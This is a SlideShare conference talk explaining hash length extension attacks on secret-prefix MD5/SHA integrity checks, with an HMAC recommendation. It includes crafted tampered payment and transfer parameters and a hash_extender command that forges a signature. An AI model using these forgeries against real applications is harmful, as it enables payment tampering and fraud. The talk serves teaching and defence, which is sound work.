SlideShare a Scribd company logo

Hash length extension attacks

Download as PPTX, PDF
J
Jerome Smith

My attempt to explain a fun attack I recently learned about - no claim to anything new here! Video of presentation at https://www.youtube.com/watch?v=3R_q5XD-RJU. Thanks go to Soroush @irsdl.

Technology
1 of 9
Hash Length Extension Attacks Jerome Smith CamSec April 2017
Introduction • An application uses this scheme as an integrity check: hash($secret + $message) // where + denotes concatenation • Whenever the message is potentially subject to interference, the hash is sent alongside • The theory goes that any message tampering will be detected • But this is potentially vulnerable to a “hash length extension attack” • Secret prefix • Attacker knows message and hash • Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384) • Thanks to Soroush Dalili @irsdl
What makes a hash vulnerable? • The hash algorithm chews on the input • At the end, the internal state of the hash algorithm is the hash it spits out • We can set the internal state of the hash algorithm to start from this point • We can then feed in more input • We now have a hash for a longer message that starts with the original input • It doesn’t matter if the input began with a secret, we don’t need to know it
Exploitation • Sounds great, doesn’t it? POST /transfer HTTP/1.1 account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233 // where hash = MD5("SECERET1020304090807060100") • So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash • This will “validate”: account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566 // where hash = MD5("SECERET10203040908070601000") • Unfortunately it’s not that simple
Deep dive • MD5 is a block-based algorithm • Padding is used to prepare the input before it’s digested • Different algorithms use different schemes • Take a message M • The input that MD5 works on is: M + PADDING + LENGTH_OF_M • This will be some whole number of blocks in length • What does that mean for our attack?
What’s really going on account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566 • We’d like hash = MD5("SECERET10203040908070601000") • When we run our hash length extension attack, the input to the hash is really: "SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH • The “message” we have a valid hash for is: "SECERET1020304090807060100" + PADDING + LENGTH + "0" • The app is checking hash($secret + $account_from + $account_to + $amount) • We need to preserve account_from=10203040&account_to=90807060 • So that leaves amount="100" + PADDING + LENGTH + "0" • The first PADDING + LENGTH was originally “metadata”: it’s now part of the data • The crafted input isn’t tolerated in context
Demo • That’s not to say it can never work seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd74 0683e182f0 // where hash = MD5($secret + $seller_id + $reference + $amount) = MD5($secret + "1234widget145.20") = MD5($secret + "1234widget145.20" + PADDING + LENGTH) • So what about seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6 d69a7fdf27744bd55cfdfc9fdb4 = MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99") • This will work if the app accepts the weird reference value • https://github.com/iagox86/hash_extender ./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 -- append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
Final Thoughts • Not always exploitable – but when it is, impact can be high • Tricky to find in a pure black box test • If the hash scheme used a delimiter, the attack would still work • Just makes it harder to find – need to know delimiter as well • But it would stop a simpler attack: seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd 740683e182f0 seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd 740683e182f0 • Secret suffix is vulnerable due to collisions • https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/ • We’ve already solved the MAC problem • “Length Extension Attacks” Burp App – not tested
9 Questions?

Recommended

The MD5 hashing algorithm
The MD5 hashing algorithmThe MD5 hashing algorithm
The MD5 hashing algorithmBob Landstrom
 
All pair shortest path by Sania Nisar
All pair shortest path by Sania NisarAll pair shortest path by Sania Nisar
All pair shortest path by Sania NisarSania Nisar
 
SHA
SHASHA
SHASubashiniRathinavel
 
SHA 1 Algorithm
SHA 1 AlgorithmSHA 1 Algorithm
SHA 1 AlgorithmShiva RamDam
 
Lzw algorithm
Lzw algorithmLzw algorithm
Lzw algorithmkeyvan moazami
 
Hashing algorithms and its uses
Hashing algorithms and its usesHashing algorithms and its uses
Hashing algorithms and its usesJawad Khan
 
Hash function
Hash function Hash function
Hash function Salman Memon
 
MD-5 : Algorithm
MD-5 : AlgorithmMD-5 : Algorithm
MD-5 : AlgorithmSahil Kureel
 

Recommended

The MD5 hashing algorithm
The MD5 hashing algorithmThe MD5 hashing algorithm
The MD5 hashing algorithmBob Landstrom
 
All pair shortest path by Sania Nisar
All pair shortest path by Sania NisarAll pair shortest path by Sania Nisar
All pair shortest path by Sania NisarSania Nisar
 
SHA
SHASHA
SHASubashiniRathinavel
 
SHA 1 Algorithm
SHA 1 AlgorithmSHA 1 Algorithm
SHA 1 AlgorithmShiva RamDam
 
Lzw algorithm
Lzw algorithmLzw algorithm
Lzw algorithmkeyvan moazami
 
Hashing algorithms and its uses
Hashing algorithms and its usesHashing algorithms and its uses
Hashing algorithms and its usesJawad Khan
 
Hash function
Hash function Hash function
Hash function Salman Memon
 
MD-5 : Algorithm
MD-5 : AlgorithmMD-5 : Algorithm
MD-5 : AlgorithmSahil Kureel
 
Information and data security digital signatures
Information and data security digital signaturesInformation and data security digital signatures
Information and data security digital signaturesMazin Alwaaly
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherNiloy Biswas
 
Open addressiing &rehashing,extendiblevhashing
Open addressiing &rehashing,extendiblevhashingOpen addressiing &rehashing,extendiblevhashing
Open addressiing &rehashing,extendiblevhashingSangeethaSasi1
 
Fake News Detection Using Machine learning algorithm
Fake News Detection Using Machine learning algorithm Fake News Detection Using Machine learning algorithm
Fake News Detection Using Machine learning algorithm MudasirBashir23
 
SHA- Secure hashing algorithm
SHA- Secure hashing algorithmSHA- Secure hashing algorithm
SHA- Secure hashing algorithmRuchi Maurya
 
18 hashing
18 hashing18 hashing
18 hashingdeonnash
 
Dinive conquer algorithm
Dinive conquer algorithmDinive conquer algorithm
Dinive conquer algorithmMohd Arif
 
11. Hashing - Data Structures using C++ by Varsha Patil
11. Hashing - Data Structures using C++ by Varsha Patil11. Hashing - Data Structures using C++ by Varsha Patil
11. Hashing - Data Structures using C++ by Varsha Patilwidespreadpromotion
 
Spam Detection Using Natural Language processing
Spam Detection Using Natural Language processingSpam Detection Using Natural Language processing
Spam Detection Using Natural Language processingयुनीक तुषार गुप्ता
 
Hashing
HashingHashing
HashingDawood Faheem Abbasi
 
Data Structures : hashing (1)
Data Structures : hashing (1)Data Structures : hashing (1)
Data Structures : hashing (1)Home
 
Lzw compression
Lzw compressionLzw compression
Lzw compressionMeghna Singh
 
Hash tables
Hash tablesHash tables
Hash tablesRajendran
 
Data Structure and Algorithms Hashing
Data Structure and Algorithms HashingData Structure and Algorithms Hashing
Data Structure and Algorithms HashingManishPrajapati78
 
Perceptron 2015.ppt
Perceptron 2015.pptPerceptron 2015.ppt
Perceptron 2015.pptSadafAyesha9
 
Network security cryptographic hash function
Network security cryptographic hash functionNetwork security cryptographic hash function
Network security cryptographic hash functionMijanur Rahman Milon
 
MD5
MD5MD5
MD5rokham khawaja
 
CNIT 141: 9. Hard Problems
CNIT 141: 9. Hard ProblemsCNIT 141: 9. Hard Problems
CNIT 141: 9. Hard ProblemsSam Bowne
 
CNIT 141: 7. Keyed Hashing
CNIT 141: 7. Keyed HashingCNIT 141: 7. Keyed Hashing
CNIT 141: 7. Keyed HashingSam Bowne
 
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPTGROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPTKrishbathija
 
Hash Function.pdf
Hash Function.pdfHash Function.pdf
Hash Function.pdfSantosh Gupta
 
Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingCheapSSLsecurity
 

More Related Content

What's hot

Information and data security digital signatures
Information and data security digital signaturesInformation and data security digital signatures
Information and data security digital signaturesMazin Alwaaly
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherNiloy Biswas
 
Open addressiing &rehashing,extendiblevhashing
Open addressiing &rehashing,extendiblevhashingOpen addressiing &rehashing,extendiblevhashing
Open addressiing &rehashing,extendiblevhashingSangeethaSasi1
 
Fake News Detection Using Machine learning algorithm
Fake News Detection Using Machine learning algorithm Fake News Detection Using Machine learning algorithm
Fake News Detection Using Machine learning algorithm MudasirBashir23
 
SHA- Secure hashing algorithm
SHA- Secure hashing algorithmSHA- Secure hashing algorithm
SHA- Secure hashing algorithmRuchi Maurya
 
18 hashing
18 hashing18 hashing
18 hashingdeonnash
 
Dinive conquer algorithm
Dinive conquer algorithmDinive conquer algorithm
Dinive conquer algorithmMohd Arif
 
11. Hashing - Data Structures using C++ by Varsha Patil
11. Hashing - Data Structures using C++ by Varsha Patil11. Hashing - Data Structures using C++ by Varsha Patil
11. Hashing - Data Structures using C++ by Varsha Patilwidespreadpromotion
 
Data Structures : hashing (1)
Data Structures : hashing (1)Data Structures : hashing (1)
Data Structures : hashing (1)Home
 
Data Structure and Algorithms Hashing
Data Structure and Algorithms HashingData Structure and Algorithms Hashing
Data Structure and Algorithms HashingManishPrajapati78
 
Perceptron 2015.ppt
Perceptron 2015.pptPerceptron 2015.ppt
Perceptron 2015.pptSadafAyesha9
 
Network security cryptographic hash function
Network security cryptographic hash functionNetwork security cryptographic hash function
Network security cryptographic hash functionMijanur Rahman Milon
 
CNIT 141: 9. Hard Problems
CNIT 141: 9. Hard ProblemsCNIT 141: 9. Hard Problems
CNIT 141: 9. Hard ProblemsSam Bowne
 
CNIT 141: 7. Keyed Hashing
CNIT 141: 7. Keyed HashingCNIT 141: 7. Keyed Hashing
CNIT 141: 7. Keyed HashingSam Bowne
 
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPTGROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPTKrishbathija
 

What's hot (20)

Information and data security digital signatures
Information and data security digital signaturesInformation and data security digital signatures
Information and data security digital signatures
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipher
 
Open addressiing &rehashing,extendiblevhashing
Open addressiing &rehashing,extendiblevhashingOpen addressiing &rehashing,extendiblevhashing
Open addressiing &rehashing,extendiblevhashing
 
Fake News Detection Using Machine learning algorithm
Fake News Detection Using Machine learning algorithm Fake News Detection Using Machine learning algorithm
Fake News Detection Using Machine learning algorithm
 
SHA- Secure hashing algorithm
SHA- Secure hashing algorithmSHA- Secure hashing algorithm
SHA- Secure hashing algorithm
 
18 hashing
18 hashing18 hashing
18 hashing
 
Dinive conquer algorithm
Dinive conquer algorithmDinive conquer algorithm
Dinive conquer algorithm
 
11. Hashing - Data Structures using C++ by Varsha Patil
11. Hashing - Data Structures using C++ by Varsha Patil11. Hashing - Data Structures using C++ by Varsha Patil
11. Hashing - Data Structures using C++ by Varsha Patil
 
Spam Detection Using Natural Language processing
Spam Detection Using Natural Language processingSpam Detection Using Natural Language processing
Spam Detection Using Natural Language processing
 
Hashing
HashingHashing
Hashing
 
Data Structures : hashing (1)
Data Structures : hashing (1)Data Structures : hashing (1)
Data Structures : hashing (1)
 
Lzw compression
Lzw compressionLzw compression
Lzw compression
 
Hash tables
Hash tablesHash tables
Hash tables
 
Data Structure and Algorithms Hashing
Data Structure and Algorithms HashingData Structure and Algorithms Hashing
Data Structure and Algorithms Hashing
 
Perceptron 2015.ppt
Perceptron 2015.pptPerceptron 2015.ppt
Perceptron 2015.ppt
 
Network security cryptographic hash function
Network security cryptographic hash functionNetwork security cryptographic hash function
Network security cryptographic hash function
 
MD5
MD5MD5
MD5
 
CNIT 141: 9. Hard Problems
CNIT 141: 9. Hard ProblemsCNIT 141: 9. Hard Problems
CNIT 141: 9. Hard Problems
 
CNIT 141: 7. Keyed Hashing
CNIT 141: 7. Keyed HashingCNIT 141: 7. Keyed Hashing
CNIT 141: 7. Keyed Hashing
 
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPTGROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
GROUP03_AMAK:ERROR DETECTION AND CORRECTION PPT
 

Similar to Hash length extension attacks

Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingCheapSSLsecurity
 
Network Security: Standards and Cryptography
Network Security: Standards and CryptographyNetwork Security: Standards and Cryptography
Network Security: Standards and CryptographyJack Davis
 
Password Storage Sucks!
Password Storage Sucks!Password Storage Sucks!
Password Storage Sucks!nerdybeardo
 
Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011Kieon
 
TM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptxTM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptxMohammedYusuf609377
 
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything elseVlad Garbuz
 
How does cryptography work? by Jeroen Ooms
How does cryptography work? by Jeroen OomsHow does cryptography work? by Jeroen Ooms
How does cryptography work? by Jeroen OomsAjay Ohri
 
Message auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptxMessage auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptxaribariaz507
 
Recover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecyRecover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecyPriyanka Aash
 
The easiest consistent hashing
The easiest consistent hashingThe easiest consistent hashing
The easiest consistent hashingDaeMyung Kang
 
Secure Hashing Techniques - Introduction
Secure Hashing Techniques - IntroductionSecure Hashing Techniques - Introduction
Secure Hashing Techniques - IntroductionUdhayyagethan Mano
 
UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)sendwithus
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authenticationMohammed Adam
 

Similar to Hash length extension attacks (20)

Hash Function.pdf
Hash Function.pdfHash Function.pdf
Hash Function.pdf
 
Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs Encoding
 
Hashing
HashingHashing
Hashing
 
Network Security: Standards and Cryptography
Network Security: Standards and CryptographyNetwork Security: Standards and Cryptography
Network Security: Standards and Cryptography
 
Password Storage Sucks!
Password Storage Sucks!Password Storage Sucks!
Password Storage Sucks!
 
Hashing
HashingHashing
Hashing
 
Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011Kieon secure passwords theory and practice 2011
Kieon secure passwords theory and practice 2011
 
TM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptxTM112 Meeting12-Cryptography.pptx
TM112 Meeting12-Cryptography.pptx
 
Ch_07 (1).pptx
Ch_07 (1).pptxCh_07 (1).pptx
Ch_07 (1).pptx
 
Hashing
HashingHashing
Hashing
 
Applied cryptanalysis - everything else
Applied cryptanalysis - everything elseApplied cryptanalysis - everything else
Applied cryptanalysis - everything else
 
How does cryptography work? by Jeroen Ooms
How does cryptography work? by Jeroen OomsHow does cryptography work? by Jeroen Ooms
How does cryptography work? by Jeroen Ooms
 
Message auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptxMessage auth. code Based on Hash Functions.pptx
Message auth. code Based on Hash Functions.pptx
 
Recover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecyRecover A RSA Private key from a TLS session with perfect forward secrecy
Recover A RSA Private key from a TLS session with perfect forward secrecy
 
Hash algorithms in IT security
Hash algorithms in IT securityHash algorithms in IT security
Hash algorithms in IT security
 
The easiest consistent hashing
The easiest consistent hashingThe easiest consistent hashing
The easiest consistent hashing
 
Secure Hashing Techniques - Introduction
Secure Hashing Techniques - IntroductionSecure Hashing Techniques - Introduction
Secure Hashing Techniques - Introduction
 
UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)UVic Startup Slam September 2014 (Kiind)
UVic Startup Slam September 2014 (Kiind)
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authentication
 
What is HSTS.pdf
What is HSTS.pdfWhat is HSTS.pdf
What is HSTS.pdf
 

Recently uploaded

Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...Product School
 
НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»
НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»
НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»QADay
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaRTTS
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupCatarinaPereira64715
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform EngineeringJemma Hussein Allen
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...Sri Ambati
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Product School
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutesconfluent
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsPaul Groth
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
 
Quantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsQuantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsVlad Stirbu
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...Product School
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Product School
 

Recently uploaded (20)

Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»
НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»
НАДІЯ ФЕДЮШКО БАЦ «Професійне зростання QA спеціаліста»
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Quantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsQuantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIs
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 

Hash length extension attacks

  • 1. Hash Length Extension Attacks Jerome Smith CamSec April 2017
  • 2. Introduction • An application uses this scheme as an integrity check: hash($secret + $message) // where + denotes concatenation • Whenever the message is potentially subject to interference, the hash is sent alongside • The theory goes that any message tampering will be detected • But this is potentially vulnerable to a “hash length extension attack” • Secret prefix • Attacker knows message and hash • Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384) • Thanks to Soroush Dalili @irsdl
  • 3. What makes a hash vulnerable? • The hash algorithm chews on the input • At the end, the internal state of the hash algorithm is the hash it spits out • We can set the internal state of the hash algorithm to start from this point • We can then feed in more input • We now have a hash for a longer message that starts with the original input • It doesn’t matter if the input began with a secret, we don’t need to know it
  • 4. Exploitation • Sounds great, doesn’t it? POST /transfer HTTP/1.1 account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233 // where hash = MD5("SECERET1020304090807060100") • So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash • This will “validate”: account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566 // where hash = MD5("SECERET10203040908070601000") • Unfortunately it’s not that simple
  • 5. Deep dive • MD5 is a block-based algorithm • Padding is used to prepare the input before it’s digested • Different algorithms use different schemes • Take a message M • The input that MD5 works on is: M + PADDING + LENGTH_OF_M • This will be some whole number of blocks in length • What does that mean for our attack?
  • 6. What’s really going on account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566 • We’d like hash = MD5("SECERET10203040908070601000") • When we run our hash length extension attack, the input to the hash is really: "SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH • The “message” we have a valid hash for is: "SECERET1020304090807060100" + PADDING + LENGTH + "0" • The app is checking hash($secret + $account_from + $account_to + $amount) • We need to preserve account_from=10203040&account_to=90807060 • So that leaves amount="100" + PADDING + LENGTH + "0" • The first PADDING + LENGTH was originally “metadata”: it’s now part of the data • The crafted input isn’t tolerated in context
  • 7. Demo • That’s not to say it can never work seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd74 0683e182f0 // where hash = MD5($secret + $seller_id + $reference + $amount) = MD5($secret + "1234widget145.20") = MD5($secret + "1234widget145.20" + PADDING + LENGTH) • So what about seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6 d69a7fdf27744bd55cfdfc9fdb4 = MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99") • This will work if the app accepts the weird reference value • https://github.com/iagox86/hash_extender ./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 -- append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
  • 8. Final Thoughts • Not always exploitable – but when it is, impact can be high • Tricky to find in a pure black box test • If the hash scheme used a delimiter, the attack would still work • Just makes it harder to find – need to know delimiter as well • But it would stop a simpler attack: seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd 740683e182f0 seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd 740683e182f0 • Secret suffix is vulnerable due to collisions • https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/ • We’ve already solved the MAC problem • “Length Extension Attacks” Burp App – not tested

Editor's Notes

  1. For MD5: PADDING is 0x80 plus null bytes LENGTH is bits in a little-endian 8 byte-field
  2. PADDING and LENGTH not necessarily printable bytes and make no sense in context of app
